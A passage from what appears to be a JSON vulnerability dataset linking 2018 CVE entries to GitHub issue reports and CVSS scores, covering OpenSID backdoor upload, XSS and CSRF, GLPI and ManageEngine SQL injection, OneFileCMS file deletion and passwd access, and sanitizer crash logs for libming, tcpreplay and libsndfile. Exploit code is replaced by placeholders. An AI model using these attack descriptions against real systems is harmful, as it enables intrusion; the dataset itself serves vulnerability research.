  21614. "description": "FILETAG FILETAG NUMBERTAG Selanjutnya simpan, dan pergi ke halaman ubah artikel yang tadi kita buat. FILETAG NUMBERTAG Ketika link download diklik, maka akan diarahkan keahalaman backdoor PHP yang berhasil terupload. Melalui backdoor ini dapat digunakan untuk mengeksekusi perintah sistem seperti whoami. Sekenario terburuknya adalah server dapat diambil alih. FILETAG Seperti apa yang diharapkan? Pengembang perlu memfilter fitur upload lampiran. Tidak hanya memfilter extension saja namun perlu memfilter mime type. Jangan perbolehkan PHP dapat diupload ke server, karena risikonya begitu besar. Apa yang terjadi? Risiko terburuknya server dapat diambil alih melalui bug ini. Informasi tambahan | Tanya | Jawab | | | Versi APITAG | APITAG NUMBERTAG pasca | Versi PHP | PHP NUMBERTAG ubuntu NUMBERTAG System operasi | Ubuntu NUMBERTAG LTS",
  21615. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21616. "severity": "CRITICAL",
  21617. "baseScore": 9.8,
  21618. "impactScore": 5.9,
  21619. "exploitabilityScore": 3.9
  21620. },
  21621. {
  21622. "CVE_ID": "CVE-2018-13039",
  21623. "Issue_Url_old": "https://github.com/OpenSID/OpenSID/issues/1175",
  21624. "Issue_Url_new": "https://github.com/opensid/opensid/issues/1175",
  21625. "Repo_new": "opensid/opensid",
  21626. "Issue_Created_At": "2018-07-01T08:11:38Z",
  21627. "description": "FILETAG Seperti apa yang diharapkan? Pengembang perlu melakukan filter spesial karakter untuk memfilter atau menggunakan library anti XSS yang terdapat pada CI untuk megantisipasi serangan XSS. Apa yang terjadi? Serangan XSS dapat berdampak pada sisi client. Melalui serangan ini dapat dimanfaatkan oleh attacker untuk mengambil cookies korban, mengalihkan kehalaman yang mengandung malware atau phising site. Informasi tambahan | Tanya | Jawab | | | Versi APITAG | APITAG NUMBERTAG pasca | Versi PHP | PHP NUMBERTAG ubuntu NUMBERTAG System operasi | Ubuntu NUMBERTAG LTS",
  21628. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21629. "severity": "MEDIUM",
  21630. "baseScore": 6.1,
  21631. "impactScore": 2.7,
  21632. "exploitabilityScore": 2.8
  21633. },
  21634. {
  21635. "CVE_ID": "CVE-2018-13040",
  21636. "Issue_Url_old": "https://github.com/OpenSID/OpenSID/issues/1176",
  21637. "Issue_Url_new": "https://github.com/opensid/opensid/issues/1176",
  21638. "Repo_new": "opensid/opensid",
  21639. "Issue_Created_At": "2018-07-01T08:36:19Z",
  21640. "description": "FILETAG FILETAG NUMBERTAG Karena tidak terdapat CSRF token yang unique, maka fitur tersebut dapat dieksploitasi menggunakan serangan CSRF. Berikut ini merupakan script exploit untuk serangan CSRF tambah akun selevel admin. ERRORTAG NUMBERTAG Apabila script diatas dilempar dan tereksekusi oleh pengguna (admin) yang sedang login pada sistem opensid, maka secara otomatis akan menambahkan pengguna baru. FILETAG FILETAG NUMBERTAG Setelah akun selevel admin berhasil ditambahkan, tentu akun tersebut dapat digunakan untuk login ke opensid dan mengambil alih sistem tersebut. Seperti apa yang diharapkan? Perlu menambahkan unique token CSRF pada setiap perubahan data baik pada method POST maupun GET untuk menghindari serangan jenis ini. Apa yang terjadi? Melalui bug CSRF ini, sistem bisa saja diambil alih oleh attacker. Namun untuk berhasil atau tidaknya, perlu adanya interaksi antara attacker dan korban. Bila korban mengakses script exploit CSRF pada saat kondisi login, maka serangan berhasil. Informasi tambahan | Tanya | Jawab | | | Versi APITAG | APITAG NUMBERTAG pasca | Versi PHP | PHP NUMBERTAG ubuntu NUMBERTAG System operasi | Ubuntu NUMBERTAG LTS",
  21641. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21642. "severity": "HIGH",
  21643. "baseScore": 8.8,
  21644. "impactScore": 5.9,
  21645. "exploitabilityScore": 2.8
  21646. },
  21647. {
  21648. "CVE_ID": "CVE-2018-13049",
  21649. "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/4270",
  21650. "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/4270",
  21651. "Repo_new": "glpi-project/glpi",
  21652. "Issue_Created_At": "2018-07-02T05:52:36Z",
  21653. "description": "NUMBERTAG SQL injection in FILETAG . Steps to reproduce (which actions have you made) : login in the glpi and make the reques FILETAG with the poc I sended the detail of the vulnerability to glpi EMAILTAG rg Expected result : you can find the result in the sql error.log Actual result : the same with the Expected result URL of the page : FILETAG Screenshot of the problem (if pertinent) : Your GLPI setup (you can find it in Setup > General menu, System tab) : you can find it in asset >computer",
  21654. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  21655. "severity": "HIGH",
  21656. "baseScore": 8.8,
  21657. "impactScore": 5.9,
  21658. "exploitabilityScore": 2.8
  21659. },
  21660. {
  21661. "CVE_ID": "CVE-2018-13050",
  21662. "Issue_Url_old": "https://github.com/x-f1v3/ForCve/issues/1",
  21663. "Issue_Url_new": "https://github.com/x-f1v3/forcve/issues/1",
  21664. "Repo_new": "x-f1v3/forcve",
  21665. "Issue_Created_At": "2018-07-02T06:15:21Z",
  21666. "description": "Zoho manageengine Applications Manager SQL Injection vulnerability. Zoho manageengine Applications Manager SQL Injection vulnerability Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: jacky xing From APITAG Proof of Concept: CODETAG This is a time based blind SQL Injection vulnerability .So I use sqlmap to exploit it APITAG following is a proof screenshot. FILETAG Databases: FILETAG User: FILETAG Table: FILETAG data: FILETAG",
  21667. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21668. "severity": "CRITICAL",
  21669. "baseScore": 9.8,
  21670. "impactScore": 5.9,
  21671. "exploitabilityScore": 3.9
  21672. },
  21673. {
  21674. "CVE_ID": "CVE-2018-13065",
  21675. "Issue_Url_old": "https://github.com/SpiderLabs/ModSecurity/issues/1829",
  21676. "Issue_Url_new": "https://github.com/spiderlabs/modsecurity/issues/1829",
  21677. "Repo_new": "spiderlabs/modsecurity",
  21678. "Issue_Created_At": "2018-07-04T10:14:11Z",
  21679. "description": "Information about new CVETAG APITAG Adipta Basu). Hi, just to inform you that yesterday NUMBERTAG rd July NUMBERTAG was published as a presumptive vulnerability on APITAG NUMBERTAG The author writes that using the following two payloads, inside an argument on the request querystring, it was able to elude XSS filters: ERRORTAG and ERRORTAG . First: the author of the CVE has not included information about the ruleset that he used during his test. Second: if he used the CRS3, obviously both payloads are detected by the rule APITAG (XSS Attack Detected via libinjection) with a Paranoia Level set to NUMBERTAG I've written to APITAG including all these information and asking for tag this CVE as DISPUTED until the author gives more information. Based on what he has written on exploit db ( URLTAG it seems that he hasn't used any ruleset... otherwise he needs to specify it. Anyway, IMHO, the CVE description is wrong because identifies as vulnerable APITAG instead a rule or a ruleset. What do you think about?",
  21680. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21681. "severity": "MEDIUM",
  21682. "baseScore": 6.1,
  21683. "impactScore": 2.7,
  21684. "exploitabilityScore": 2.8
  21685. },
  21686. {
  21687. "CVE_ID": "CVE-2018-13066",
  21688. "Issue_Url_old": "https://github.com/libming/libming/issues/146",
  21689. "Issue_Url_new": "https://github.com/libming/libming/issues/146",
  21690. "Repo_new": "libming/libming",
  21691. "Issue_Created_At": "2018-07-02T14:21:04Z",
  21692. "description": "Memory leak in parser.c. `jsx APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG ebba in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG b5e in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG cb NUMBERTAG in APITAG PATHTAG NUMBERTAG dd NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG f in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG fdd8 in APITAG PATHTAG NUMBERTAG ebba in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG cbbf in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG cbbf in APITAG PATHTAG NUMBERTAG fd5 in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG be NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG fca7 in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG eb9 in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG c3a2 in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG f4bb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG fdfb in APITAG PATHTAG NUMBERTAG ebba in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG fbda in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG cbbf in APITAG PATHTAG NUMBERTAG af0 in APITAG PATHTAG NUMBERTAG acb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG cbbf in APITAG PATHTAG NUMBERTAG af0 in APITAG PATHTAG NUMBERTAG f9 in APITAG PATHTAG NUMBERTAG acb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG acb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG acb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG b2c5 in APITAG PATHTAG NUMBERTAG fe NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG edb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG f9 in APITAG PATHTAG NUMBERTAG acb in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG aaf9 in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG fe NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in malloc ( PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG fe NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG f9c5 in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG caf in APITAG PATHTAG NUMBERTAG fc in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG in realloc ( PATHTAG NUMBERTAG b5e in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG f NUMBERTAG d in APITAG PATHTAG NUMBERTAG c4 in APITAG PATHTAG NUMBERTAG b1 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). \u2019\u2018\u2019 poc URLTAG listswf $poc",
  21693. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  21694. "severity": "HIGH",
  21695. "baseScore": 7.5,
  21696. "impactScore": 3.6,
  21697. "exploitabilityScore": 3.9
  21698. },
  21699. {
  21700. "CVE_ID": "CVE-2018-13106",
  21701. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/489",
  21702. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/489",
  21703. "Repo_new": "clippercms/clippercms",
  21704. "Issue_Created_At": "2018-07-03T13:32:02Z",
  21705. "description": "Stored XSS is found in CMS Clipper NUMBERTAG ersion. Affected Version : Clipper NUMBERTAG Affected URL: PATHTAG Steps to POC NUMBERTAG Under Tools > Configuration Found multiple stored XSS APITAG NUMBERTAG APITAG APITAG APITAG APITAG APITAG FILETAG FILETAG",
  21706. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  21707. "severity": "MEDIUM",
  21708. "baseScore": 4.8,
  21709. "impactScore": 2.7,
  21710. "exploitabilityScore": 1.7
  21711. },
  21712. {
  21713. "CVE_ID": "CVE-2018-13112",
  21714. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/477",
  21715. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/477",
  21716. "Repo_new": "appneta/tcpreplay",
  21717. "Issue_Created_At": "2018-07-03T07:03:24Z",
  21718. "description": "heap buffer overflow in PATHTAG function get_l2len. heap buffer overflow in PATHTAG function get_l2len command: APITAG asan report: ERRORTAG",
  21719. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  21720. "severity": "HIGH",
  21721. "baseScore": 7.5,
  21722. "impactScore": 3.6,
  21723. "exploitabilityScore": 3.9
  21724. },
  21725. {
  21726. "CVE_ID": "CVE-2018-13121",
  21727. "Issue_Url_old": "https://github.com/921580451/RealOnePlayer-sBug/issues/1",
  21728. "Issue_Url_new": "https://github.com/921580451/realoneplayer-sbug/issues/1",
  21729. "Repo_new": "921580451/RealOnePlayer-sBug",
  21730. "Issue_Created_At": "2018-07-03T03:32:44Z",
  21731. "description": "There is a Denial of service vulnerability. Use APITAG Build NUMBERTAG to open the file in archive, will cause a crash. FILETAG",
  21732. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  21733. "severity": "MEDIUM",
  21734. "baseScore": 5.5,
  21735. "impactScore": 3.6,
  21736. "exploitabilityScore": 1.8
  21737. },
  21738. {
  21739. "CVE_ID": "CVE-2018-13122",
  21740. "Issue_Url_old": "https://github.com/Self-Evident/OneFileCMS/issues/49",
  21741. "Issue_Url_new": "https://github.com/self-evident/onefilecms/issues/49",
  21742. "Repo_new": "self-evident/onefilecms",
  21743. "Issue_Created_At": "2018-07-03T14:12:25Z",
  21744. "description": "onefilecms.php in APITAG through NUMBERTAG might allow attackers to delete anyfile or folders they want on the delete screen. access FILETAG by username/password FILETAG access URLTAG FILETAG Click APITAG FILETAG",
  21745. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  21746. "severity": "MEDIUM",
  21747. "baseScore": 6.5,
  21748. "impactScore": 3.6,
  21749. "exploitabilityScore": 2.8
  21750. },
  21751. {
  21752. "CVE_ID": "CVE-2018-13123",
  21753. "Issue_Url_old": "https://github.com/Self-Evident/OneFileCMS/issues/50",
  21754. "Issue_Url_new": "https://github.com/self-evident/onefilecms/issues/50",
  21755. "Repo_new": "self-evident/onefilecms",
  21756. "Issue_Created_At": "2018-07-03T14:21:03Z",
  21757. "description": "FILETAG in APITAG through NUMBERTAG might allow attackers to access some secret file like passwd. onefilecms.php in APITAG through NUMBERTAG might allow attackers to access some secret file like passwd access APITAG FILETAG",
  21758. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21759. "severity": "CRITICAL",
  21760. "baseScore": 9.8,
  21761. "impactScore": 5.9,
  21762. "exploitabilityScore": 3.9
  21763. },
  21764. {
  21765. "CVE_ID": "CVE-2018-13136",
  21766. "Issue_Url_old": "https://github.com/ultimatemember/ultimatemember/issues/456",
  21767. "Issue_Url_new": "https://github.com/ultimatemember/ultimatemember/issues/456",
  21768. "Repo_new": "ultimatemember/ultimatemember",
  21769. "Issue_Created_At": "2018-06-08T11:44:43Z",
  21770. "description": "Security Issue. Ultimate Member Version Tell us what UM core version you use NUMBERTAG Subject of the issue Persistent XSS vulnerability. Steps to reproduce the behavior APITAG page title as APITAG APITAG APITAG Ultimate Members > Settings, It ll reflected in General Tab All Vectors. APITAG reset NUMBERTAG D NUMBERTAG",
  21771. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21772. "severity": "MEDIUM",
  21773. "baseScore": 6.1,
  21774. "impactScore": 2.7,
  21775. "exploitabilityScore": 2.8
  21776. },
  21777. {
  21778. "CVE_ID": "CVE-2018-13139",
  21779. "Issue_Url_old": "https://github.com/erikd/libsndfile/issues/397",
  21780. "Issue_Url_new": "https://github.com/libsndfile/libsndfile/issues/397",
  21781. "Repo_new": "libsndfile/libsndfile",
  21782. "Issue_Created_At": "2018-07-03T04:08:59Z",
  21783. "description": "stack buffer overflow in psf_memset in PATHTAG stack buffer overflow in psf_memset in PATHTAG FILETAG ./sndfile deinterleave $poc NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffea NUMBERTAG d0 at pc NUMBERTAG f NUMBERTAG a3bec bp NUMBERTAG ffea NUMBERTAG e2f0 sp NUMBERTAG ffea NUMBERTAG da NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffea NUMBERTAG d0 thread T NUMBERTAG f NUMBERTAG a3beb in __asan_memset ( PATHTAG NUMBERTAG f NUMBERTAG fc NUMBERTAG bf in psf_memset PATHTAG NUMBERTAG f NUMBERTAG ed NUMBERTAG in sf_readf_int PATHTAG NUMBERTAG e1c in deinterleave_int PATHTAG NUMBERTAG c NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG bed NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c8 in _start ( PATHTAG ) Address NUMBERTAG ffea NUMBERTAG d0 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG a5 in main PATHTAG",
  21784. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21785. "severity": "HIGH",
  21786. "baseScore": 8.8,
  21787. "impactScore": 5.9,
  21788. "exploitabilityScore": 2.8
  21789. },
  21790. {
  21791. "CVE_ID": "CVE-2018-13153",
  21792. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1195",
  21793. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1195",
  21794. "Repo_new": "imagemagick/imagemagick",
  21795. "Issue_Created_At": "2018-07-04T08:05:57Z",
  21796. "description": "memory leak bug in APITAG APITAG function. Prerequisites ] I have written a descriptive issue title [ ] I have verified that I am using the latest version of APITAG [ ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG hello,i find a memory leak bug in imagemagick,the details is on the Steps to Reproduce. Steps to Reproduce <! List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code ( ERRORTAG filelist=(char ) APITAG )); CODETAG if ((status == APITAG || (number_files NUMBERTAG if (number_files NUMBERTAG ERRORTAG APITAG ) NULL); } ERRORTAG filenames); APITAG ) NULL); }` APITAG",
  21797. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  21798. "severity": "MEDIUM",
  21799. "baseScore": 6.5,
  21800. "impactScore": 3.6,
